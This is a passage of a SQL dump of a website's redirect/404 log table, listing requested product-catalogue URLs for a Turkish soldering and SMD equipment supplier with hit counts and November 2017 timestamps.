06:11:26','0000-00-00 00:00:00',301),(12706,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,product_sku/results,1-50',NULL,'','',3,0,'2017-11-20 06:14:59','0000-00-00 00:00:00',301),(12707,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/dirdesc/results,1-5',NULL,'','',4,0,'2017-11-20 06:22:11','0000-00-00 00:00:00',301),(12708,'http://www.3s-technologies.com.tr/en/wp-content/plugins/wp-easy-gallery-pro/admin/php.php',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/wp-easy-gallery-pro/admin/php.php','',12,0,'2017-11-20 06:23:03','0000-00-00 00:00:00',301),(12709,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/screen-printer/by,`p`.product_sku?language=tr-tr',NULL,'','',24,0,'2017-11-20 06:43:03','0000-00-00 00:00:00',301),(12710,'http://3s-technologies.com.tr/index.php/en/products/screen-printer/by,category_name/dirdesc?language=en-gb',NULL,'','',17,0,'2017-11-20 06:46:45','0000-00-00 00:00:00',301),(12711,'http://www.3s-technologies.com.tr/index.php/en/products/krem-lehim/krem-lehim-31-detail',NULL,'','',25,0,'2017-11-20 06:48:22','0000-00-00 00:00:00',301),(12712,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,product_sku/results,1-20',NULL,'','',4,0,'2017-11-20 06:50:59','0000-00-00 00:00:00',301),(12713,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-20 07:02:27','0000-00-00 00:00:00',301),(12714,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim',NULL,'','',31,0,'2017-11-20 07:21:26','0000-00-00 00:00:00',301),(12715,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,product_name/results,1-20',NULL,'','',1,0,'2017-11-20 07:26:59','0000-00-00 00:00:00',301),(12716,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/results,1-5',NULL,'','',6,0,'2017-11-20 07:34:11','0000-00-00 00:00:00',301),(12717,'http://3s-technologies.com.tr/index.php/tr/ueruenler/ess-310-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-11-20 07:44:54','0000-00-00 00:00:00',301),(12718,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer',NULL,'','',2,0,'2017-11-20 07:48:35','0000-00-00 00:00:00',301),(12719,'http://www.3s-technologies.com.tr/en/products/smd-fä±rä±n/by,product_name/dirdesc',NULL,'','',1,0,'2017-11-20 07:53:57','0000-00-00 00:00:00',301),(12720,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/results,1-10',NULL,'','',11,0,'2017-11-20 07:55:47','0000-00-00 00:00:00',301),(12721,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku?language=tr-tr',NULL,'','',1,0,'2017-11-20 08:00:26','0000-00-00 00:00:00',301),(12722,'http://3s-technologies.com.tr/en/products/dalga-lehim/spartan-8s-8d-44-detail/askquestion?tmpl=component',NULL,'','',16,0,'2017-11-20 08:04:10','0000-00-00 00:00:00',301),(12723,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,product_sku/results,1-10',NULL,'','',3,0,'2017-11-20 08:10:11','0000-00-00 00:00:00',301),(12724,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,ordering?language=en-gb',NULL,'','',1,0,'2017-11-20 08:29:40','0000-00-00 00:00:00',301),(12725,'http://www.3s-technologies.com.tr/en/wp-content/plugins/tevolution/tmplconnector/monetize/templatic-custom_fields/css/jquery.lightbox.css',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/css/jquery.lightbox.css','',6,0,'2017-11-20 08:37:39','0000-00-00 00:00:00',301),(12726,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,product_name/results,1-10',NULL,'','',9,0,'2017-11-20 08:38:58','0000-00-00 00:00:00',301),(12727,'http://3s-technologies.com.tr/en/products/smd-düşük-hızlı/dirdesc',NULL,'','',390,0,'2017-11-20 08:40:01','0000-00-00 00:00:00',301),(12728,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/results,1-100',NULL,'','',2,0,'2017-11-20 08:46:10','0000-00-00 00:00:00',301),(12729,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,mf_name',NULL,'','',5,0,'2017-11-20 08:53:22','0000-00-00 00:00:00',301),(12730,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by,mf_name?language=en-gb',NULL,'','',8,0,'2017-11-20 09:05:41','0000-00-00 00:00:00',301),(12731,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/results,1-10',NULL,'','',20,0,'2017-11-20 09:14:59','0000-00-00 00:00:00',301),(12732,'http://3s-technologies.com.tr/tr/urunler/avb-detail?tmpl=component&print=1',NULL,'','',15,0,'2017-11-20 09:25:14','0000-00-00 00:00:00',301),(12733,'http://3s-technologies.com.tr/index.php/en/products/konveyorler',NULL,'','',25,0,'2017-11-20 09:26:14','0000-00-00 00:00:00',301),(12734,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,`p`.product_sku/results,1-5',NULL,'','',7,0,'2017-11-20 09:36:34','0000-00-00 00:00:00',301),(12735,'http://3s-technologies.com.tr/en/products/am100-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-11-20 09:37:32','0000-00-00 00:00:00',301),(12736,'http://3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,product_sku',NULL,'','',384,0,'2017-11-20 09:41:46','0000-00-00 00:00:00',301),(12737,'http://3s-technologies.com.tr/en/products/temizleme-makineleri/by,`p`.product_sku/dirdesc/results,1-5',NULL,'','',4,0,'2017-11-20 09:43:46','0000-00-00 00:00:00',301),(12738,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,category_name/results,1-5',NULL,'','',1,0,'2017-11-20 09:50:58','0000-00-00 00:00:00',301),(12739,'http://www.3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/by,product_sku',NULL,'','',242,0,'2017-11-20 10:12:34','0000-00-00 00:00:00',301),(12740,'http://www.3s-technologies.com.tr/en/products/smd-orta-hızlı/by,mf_name/results,1-50',NULL,'','',12,0,'2017-11-20 10:26:58','0000-00-00 00:00:00',301),(12741,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,mf_name/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-20 10:32:07','0000-00-00 00:00:00',301),(12742,'http://www.3s-technologies.com.tr/index.php/en/products/flux/by,ordering?language=en-gb',NULL,'','',25,0,'2017-11-20 10:46:16','0000-00-00 00:00:00',301),(12743,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,`p`.product_sku/results,1-10',NULL,'','',4,0,'2017-11-20 10:48:34','0000-00-00 00:00:00',301),(12744,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/245-sn63pb37-0.4mm-29-detail',NULL,'','',26,0,'2017-11-20 10:50:33','0000-00-00 00:00:00',301),(12745,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim-31-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-11-20 10:53:14','0000-00-00 00:00:00',301),(12746,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,mf_name?language=en-gb',NULL,'','',3,0,'2017-11-20 10:54:11','0000-00-00 00:00:00',301),(12747,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,ordering',NULL,'','',3,0,'2017-11-20 10:55:46','0000-00-00 00:00:00',301),(12748,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer',NULL,'','',57,0,'2017-11-20 10:58:14','0000-00-00 00:00:00',301),(12749,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/rl132-detail',NULL,'','',39,0,'2017-11-20 11:01:06','0000-00-00 00:00:00',301),(12750,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/mx200lp-detail?tmpl=component&print=1',NULL,'','',25,0,'2017-11-20 11:19:08','0000-00-00 00:00:00',301),(12751,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku?language=en-gb',NULL,'','',3,0,'2017-11-20 11:23:30','0000-00-00 00:00:00',301),(12752,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',2,0,'2017-11-20 11:38:32','0000-00-00 00:00:00',301),(12753,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,product_name/results,1-50',NULL,'','',4,0,'2017-11-20 11:53:22','0000-00-00 00:00:00',301),(12754,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,product_sku',NULL,'','',29,0,'2017-11-20 12:10:56','0000-00-00 00:00:00',301),(12755,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/screen-printer/by,mf_name?language=tr-tr',NULL,'','',24,0,'2017-11-20 12:12:26','0000-00-00 00:00:00',301),(12756,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/results,1-10',NULL,'','',3,0,'2017-11-20 12:28:29','0000-00-00 00:00:00',301),(12757,'http://www.3s-technologies.com.tr/en/products/ess-310-24-detail?tmpl=component&print=1',NULL,'','',27,0,'2017-11-20 12:39:18','0000-00-00 00:00:00',301),(12758,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,product_sku',NULL,'','',6,0,'2017-11-20 12:41:07','0000-00-00 00:00:00',301),(12759,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,category_name/results,1-50',NULL,'','',6,0,'2017-11-20 12:47:26','0000-00-00 00:00:00',301),(12760,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,category_name/dirdesc?language=en-gb',NULL,'','',3,0,'2017-11-20 12:47:28','0000-00-00 00:00:00',301),(12761,'http://3s-technologies.com.tr/tr/urunler/av132-detail?tmpl=component&print=1',NULL,'','',21,0,'2017-11-20 12:59:10','0000-00-00 00:00:00',301),(12762,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim?language=en-gb',NULL,'','',1,0,'2017-11-20 13:00:08','0000-00-00 00:00:00',301),(12763,'http://3s-technologies.com.tr/index.php/en/products/manufacturers/panasonic',NULL,'','',28,0,'2017-11-20 13:07:15','0000-00-00 00:00:00',301),(12764,'http://3s-technologies.com.tr/index.php/tr/anasayfa2/78-turkish-tr',NULL,'','',14,0,'2017-11-20 13:20:00','0000-00-00 00:00:00',301),(12765,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,`p`.product_sku/results,1-50',NULL,'','',4,0,'2017-11-20 13:25:19','0000-00-00 00:00:00',301),(12766,'http://3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/spartan-8s-8d-detail',NULL,'','',9,0,'2017-11-20 13:26:08','0000-00-00 00:00:00',301),(12767,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,category_name/results,1-20',NULL,'','',3,0,'2017-11-20 13:44:16','0000-00-00 00:00:00',301),(12768,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/by,category_name',NULL,'','',41,0,'2017-11-20 14:03:13','0000-00-00 00:00:00',301),(12769,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,category_name/results,1-20',NULL,'','',1,0,'2017-11-20 14:09:32','0000-00-00 00:00:00',301),(12770,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/avf-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-11-20 14:27:49','0000-00-00 00:00:00',301),(12771,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-20 14:31:37','0000-00-00 00:00:00',301),(12772,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,`p`.product_sku/results,1-20',NULL,'','',1,0,'2017-11-20 14:41:06','0000-00-00 00:00:00',301),(12773,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,`p`.product_sku/dirdesc',NULL,'','',3,0,'2017-11-20 14:47:25','0000-00-00 00:00:00',301),(12774,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/245-sn63pb37-0.4mm-29-detail?tmpl=component&print=1',NULL,'','',25,0,'2017-11-20 14:47:45','0000-00-00 00:00:00',301),(12775,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/screen-printer/by,product_sku',NULL,'','',36,0,'2017-11-20 14:55:24','0000-00-00 00:00:00',301),(12776,'http://3s-technologies.com.tr/en/products/mx200lp-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-11-20 15:04:44','0000-00-00 00:00:00',301),(12777,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,pc.ordering,product_name/dirdesc',NULL,'','',2,0,'2017-11-20 15:05:32','0000-00-00 00:00:00',301),(12778,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/screen-printer/by,product_sku?language=tr-tr',NULL,'','',26,0,'2017-11-20 15:21:55','0000-00-00 00:00:00',301),(12779,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,`p`.product_sku/results,1-5',NULL,'','',3,0,'2017-11-20 15:25:19','0000-00-00 00:00:00',301),(12780,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,category_name/results,1-10',NULL,'','',3,0,'2017-11-20 15:31:38','0000-00-00 00:00:00',301),(12781,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,mf_name',NULL,'','',402,0,'2017-11-20 15:36:13','0000-00-00 00:00:00',301),(12782,'http://3s-technologies.com.tr/en/products/manufacturers/panasonic',NULL,'','',42,0,'2017-11-20 15:36:21','0000-00-00 00:00:00',301),(12783,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,pc.ordering,product_name/results,1-5',NULL,'','',1,0,'2017-11-20 15:37:57','0000-00-00 00:00:00',301),(12784,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/dalga-lehim/by,category_name?language=tr-tr',NULL,'','',13,0,'2017-11-20 15:38:48','0000-00-00 00:00:00',301),(12785,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,mf_name/dirdesc?language=tr-tr',NULL,'','',2,0,'2017-11-20 15:49:11','0000-00-00 00:00:00',301),(12786,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-11-20 16:11:19','0000-00-00 00:00:00',301),(12787,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,`p`.product_sku/dirdesc',NULL,'','',7,0,'2017-11-20 16:22:10','0000-00-00 00:00:00',301),(12788,'http://www.3s-technologies.com.tr/tr/user?view=registration',NULL,'http://www.3s-technologies.com.tr/tr/user?view=registration','',1,0,'2017-11-20 16:27:24','0000-00-00 00:00:00',301),(12789,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,pc.ordering,product_name/results,1-20',NULL,'','',4,0,'2017-11-20 16:28:28','0000-00-00 00:00:00',301),(12790,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,product_sku?language=tr-tr',NULL,'','',1,0,'2017-11-20 16:57:30','0000-00-00 00:00:00',301),(12791,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,pc.ordering,product_name/results,1-50',NULL,'','',1,0,'2017-11-20 17:19:00','0000-00-00 00:00:00',301),(12792,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/jv131-detail',NULL,'','',35,0,'2017-11-20 17:23:42','0000-00-00 00:00:00',301),(12793,'http://www.3s-technologies.com.tr/tr/option=com_user&view=register',NULL,'http://www.3s-technologies.com.tr/tr/option=com_user&view=register','',1,0,'2017-11-20 17:33:50','0000-00-00 00:00:00',301),(12794,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/aqueous',NULL,'','',27,0,'2017-11-20 17:40:01','0000-00-00 00:00:00',301),(12795,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/by,mf_name?language=en-gb',NULL,'','',20,0,'2017-11-20 17:46:03','0000-00-00 00:00:00',301),(12796,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,product_sku?language=en-gb',NULL,'','',13,0,'2017-11-20 17:47:24','0000-00-00 00:00:00',301),(12797,'http://www.3s-technologies.com.tr/index.php/en/products/gf-12-hc-ht-detail?tmpl=component&print=1',NULL,'','',27,0,'2017-11-20 17:52:34','0000-00-00 00:00:00',301),(12798,'http://3s-technologies.com.tr/index.php/tr/ueruenler/flux/by,mf_name/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-11-20 18:07:24','0000-00-00 00:00:00',301),(12799,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/results,1-20',NULL,'','',12,0,'2017-11-20 18:47:25','0000-00-00 00:00:00',301),(12800,'http://3s-technologies.com.tr/index.php/tr/ueruenler/trident-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-11-20 18:51:44','0000-00-00 00:00:00',301),(12801,'http://3s-technologies.com.tr/index.php/tr/ueruenler/955lc-detail?tmpl=component&print=1',NULL,'','',14,0,'2017-11-20 19:03:15','0000-00-00 00:00:00',301),(12802,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/screen-printer/dirdesc?language=tr-tr',NULL,'','',25,0,'2017-11-20 19:07:37','0000-00-00 00:00:00',301),(12803,'http://www.3s-technologies.com.tr/index.php/en/products/2.-el-makineler/by,mf_name?language=en-gb',NULL,'','',27,0,'2017-11-20 19:23:16','0000-00-00 00:00:00',301),(12804,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,product_name/dirdesc',NULL,'','',9,0,'2017-11-20 19:31:37','0000-00-00 00:00:00',301),(12805,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/275-k100-1.2mm-detail',NULL,'','',27,0,'2017-11-20 19:32:21','0000-00-00 00:00:00',301),(12806,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/dalga-lehim/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',24,0,'2017-11-20 19:50:45','0000-00-00 00:00:00',301),(12807,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,product_name/results,1-40',NULL,'','',1,0,'2017-11-20 20:09:31','0000-00-00 00:00:00',301),(12808,'http://www.3s-technologies.com.tr/tr/?option=com_users&view=register',NULL,'http://www.3s-technologies.com.tr/tr/?option=com_users&view=register','',1,0,'2017-11-20 20:13:49','0000-00-00 00:00:00',301),(12809,'http://www.3s-technologies.com.tr/tr/urunler/konveyorler/results,1-50',NULL,'','',1,0,'2017-11-20 20:15:50','0000-00-00 00:00:00',301),(12810,'http://www.3s-technologies.com.tr/index.php/en/products/2.-el-makineler/jvk-detail',NULL,'','',28,0,'2017-11-20 20:34:46','0000-00-00 00:00:00',301),(12811,'http://3s-technologies.com.tr/wp-includes/wp-pages.lib.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-20 20:59:01','0000-00-00 00:00:00',301),(12812,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/by,category_name/dirdesc',NULL,'','',199,0,'2017-11-20 21:00:03','0000-00-00 00:00:00',301),(12813,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/275-k100-1mm-detail',NULL,'','',24,0,'2017-11-20 21:07:41','0000-00-00 00:00:00',301),(12814,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/955lc-37-detail',NULL,'','',10,0,'2017-11-20 21:12:28','0000-00-00 00:00:00',301),(12815,'http://3s-technologies.com.tr/index.php/en/products/thru-hole/by,product_name/dirdesc?language=en-gb',NULL,'','',8,0,'2017-11-20 21:18:05','0000-00-00 00:00:00',301),(12816,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/mx200lp-detail/askquestion?tmpl=component',NULL,'','',51,0,'2017-11-20 21:20:56','0000-00-00 00:00:00',301),(12817,'http://www.3s-technologies.com.tr/tr/?option=com_registration&task=register',NULL,'http://www.3s-technologies.com.tr/tr/?option=com_registration&task=register','',16,0,'2017-11-20 21:29:55','0000-00-00 00:00:00',301),(12818,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-fırın',NULL,'','',544,0,'2017-11-20 21:34:31','0000-00-00 00:00:00',301),(12819,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-detail',NULL,'','',10,0,'2017-11-20 21:37:53','0000-00-00 00:00:00',301),(12820,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/e-bar-26-detail/askquestion?tmpl=component',NULL,'','',49,0,'2017-11-20 21:50:45','0000-00-00 00:00:00',301),(12821,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/dalga-lehim/by,product_sku?language=tr-tr',NULL,'','',24,0,'2017-11-20 22:05:09','0000-00-00 00:00:00',301),(12822,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,category_name/results,1-10',NULL,'','',1,0,'2017-11-20 22:09:31','0000-00-00 00:00:00',301),(12823,'http://www.3s-technologies.com.tr/index.php/en/products/screen-printer/spr-20-41-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-11-20 22:18:31','0000-00-00 00:00:00',301),(12824,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/dalga-lehim/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-11-20 22:21:15','0000-00-00 00:00:00',301),(12825,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/aqueous',NULL,'','',17,0,'2017-11-20 22:24:55','0000-00-00 00:00:00',301),(12826,'http://3s-technologies.com.tr/en/products/manufacturer/aqueous',NULL,'','',17,0,'2017-11-20 22:37:04','0000-00-00 00:00:00',301),(12827,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/results,1-10',NULL,'','',4,0,'2017-11-20 22:41:05','0000-00-00 00:00:00',301),(12828,'https://www.3s-technologies.com.tr/tr/apple-app-site-association',NULL,'','',131,0,'2017-11-20 22:41:35','0000-00-00 00:00:00',301),(12829,'http://www.3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by,category_name/dirdesc?language=en-gb',NULL,'','',24,0,'2017-11-20 22:48:02','0000-00-00 00:00:00',301),(12830,'http://www.3s-technologies.com.tr/tr/urunler/konveyorler/by,product_sku',NULL,'','',51,0,'2017-11-20 23:00:02','0000-00-00 00:00:00',301),(12831,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/dirdesc?language=en-gb',NULL,'','',24,0,'2017-11-20 23:04:52','0000-00-00 00:00:00',301),(12832,'http://3s-technologies.com.tr/en/products/2.-el-makineler/jvk-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-11-20 23:06:14','0000-00-00 00:00:00',301),(12833,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',4,0,'2017-11-20 23:09:38','0000-00-00 00:00:00',301),(12834,'http://3s-technologies.com.tr/en/products/smd-fırın/by,product_name',NULL,'','',419,0,'2017-11-20 23:13:58','0000-00-00 00:00:00',301),(12835,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,pc.ordering,product_name/results,1-10',NULL,'','',3,0,'2017-11-20 23:19:14','0000-00-00 00:00:00',301),(12836,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',488,0,'2017-11-20 23:48:02','0000-00-00 00:00:00',301),(12837,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,`p`.product_sku/results,1-5',NULL,'','',4,0,'2017-11-20 23:57:38','0000-00-00 00:00:00',301),(12838,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,mf_name/results,1-20',NULL,'','',1,0,'2017-11-21 00:02:37','0000-00-00 00:00:00',301),(12839,'http://3s-technologies.com.tr/en/products/temizleme-makineleri/dirdesc',NULL,'','',20,0,'2017-11-21 00:11:08','0000-00-00 00:00:00',301),(12840,'http://3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,product_name',NULL,'','',380,0,'2017-11-21 00:40:44','0000-00-00 00:00:00',301),(12841,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,`p`.product_sku/results,1-50',NULL,'','',3,0,'2017-11-21 00:40:49','0000-00-00 00:00:00',301),(12842,'http://www.3s-technologies.com.tr/en/products/smd-fırın/by,category_name/dirdesc/results,1-5',NULL,'','',1,0,'2017-11-21 00:45:37','0000-00-00 00:00:00',301),(12843,'http://www.3s-technologies.com.tr/en/products/screen-printer/by,product_name',NULL,'','',37,0,'2017-11-21 00:50:43','0000-00-00 00:00:00',301),(12844,'http://3s-technologies.com.tr/tr/urunler/ls60v-detail?tmpl=component&print=1',NULL,'','',18,0,'2017-11-21 00:58:49','0000-00-00 00:00:00',301),(12845,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,product_name',NULL,'','',35,0,'2017-11-21 01:18:33','0000-00-00 00:00:00',301),(12846,'http://3s-technologies.com.tr/index.php/en/products/dalga-lehim/by,`p`.product_sku?language=en-gb',NULL,'','',14,0,'2017-11-21 01:22:13','0000-00-00 00:00:00',301),(12847,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux/dirdesc',NULL,'','',9,0,'2017-11-21 01:32:50','0000-00-00 00:00:00',301),(12848,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux/955lc-37-detail',NULL,'','',8,0,'2017-11-21 01:33:33','0000-00-00 00:00:00',301),(12849,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/jvk-detail',NULL,'','',8,0,'2017-11-21 01:33:38','0000-00-00 00:00:00',301),(12850,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,`p`.product_sku/results,1-20',NULL,'','',1,0,'2017-11-21 01:38:27','0000-00-00 00:00:00',301),(12851,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,category_name',NULL,'','',218,0,'2017-11-21 01:55:14','0000-00-00 00:00:00',301),(12852,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,ordering?language=tr-tr',NULL,'','',1,0,'2017-11-21 02:03:40','0000-00-00 00:00:00',301),(12853,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,ordering/results,1-50',NULL,'','',13,0,'2017-11-21 02:12:02','0000-00-00 00:00:00',301),(12854,'http://www.3s-technologies.com.tr/en/products/smd-fırın/by,category_name/dirdesc/results,1-10',NULL,'','',4,0,'2017-11-21 02:16:49','0000-00-00 00:00:00',301),(12855,'http://www.3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/results,1-5',NULL,'','',11,0,'2017-11-21 02:21:37','0000-00-00 00:00:00',301),(12856,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,`p`.product_sku/results,1-10',NULL,'','',2,0,'2017-11-21 02:50:25','0000-00-00 00:00:00',301),(12857,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/results,1-10',NULL,'','',13,0,'2017-11-21 02:55:13','0000-00-00 00:00:00',301),(12858,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/product/resized/cs-40_250x250.gif',NULL,'','',1,0,'2017-11-21 03:15:14','0000-00-00 00:00:00',301),(12859,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/category/resized/trident_full_view_250x250.jpg',NULL,'','',1,0,'2017-11-21 03:15:21','0000-00-00 00:00:00',301),(12860,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/results,1-5',NULL,'','',4,0,'2017-11-21 03:19:13','0000-00-00 